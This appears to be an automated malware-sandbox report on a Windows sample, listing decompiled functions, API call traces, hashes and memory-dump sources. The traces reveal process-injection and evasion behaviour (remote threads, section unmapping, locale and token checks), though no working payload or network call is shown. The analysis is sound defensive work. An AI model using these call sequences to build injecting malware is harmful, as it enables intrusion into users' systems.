Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4003, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 105 Total matches: 5memorystring

Similarity

Total matches: 5
API ID: VirtualAllocVirtualFreelstrcpynmemcpy
String ID: Apr 14 2018$pnls$pnls
API String ID: 1980370899-1480254790
Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f

APIs

lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106

Strings

pnls, xrefs: 002E40DF
pnls, xrefs: 002E40DA
Apr 14 2018, xrefs: 002E4083

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E144C, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 49 Total matches: 9memory

Similarity

Total matches: 9
API ID: HeapFreeStrStrI
String ID: pnls
API String ID: 4137399961-141991303
Opcode ID: 4aa7b909af106ac1487055971ad23c5d9ff314578936fa2f1abc21ea428e854d
Instruction ID: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
Opcode Fuzzy Hash: E6D095824D6F9B47C9517014971DE702580FF430D3D9B726405C1434515F00301F1D1D
Instruction Fuzzy Hash: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885

APIs

Part of subcall function 002E47D3: memcpy.NTDLL(00000004,?,?,?,00000000), ref: 002E48C3

HeapFree.KERNEL32(00000000,?,?), ref: 002E14BE

Part of subcall function 002E3D12: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C), ref: 002E3D27
Part of subcall function 002E3D12: GetSystemDefaultUILanguage.KERNEL32(?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C,?,?,?,002E1800,00000000,?,002E7494), ref: 002E3D31

StrStrIA.SHLWAPI(00000000,002E7494), ref: 002E14A4

Strings

pnls, xrefs: 002E1451, 002E1460, 002E1477, 002E1484

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
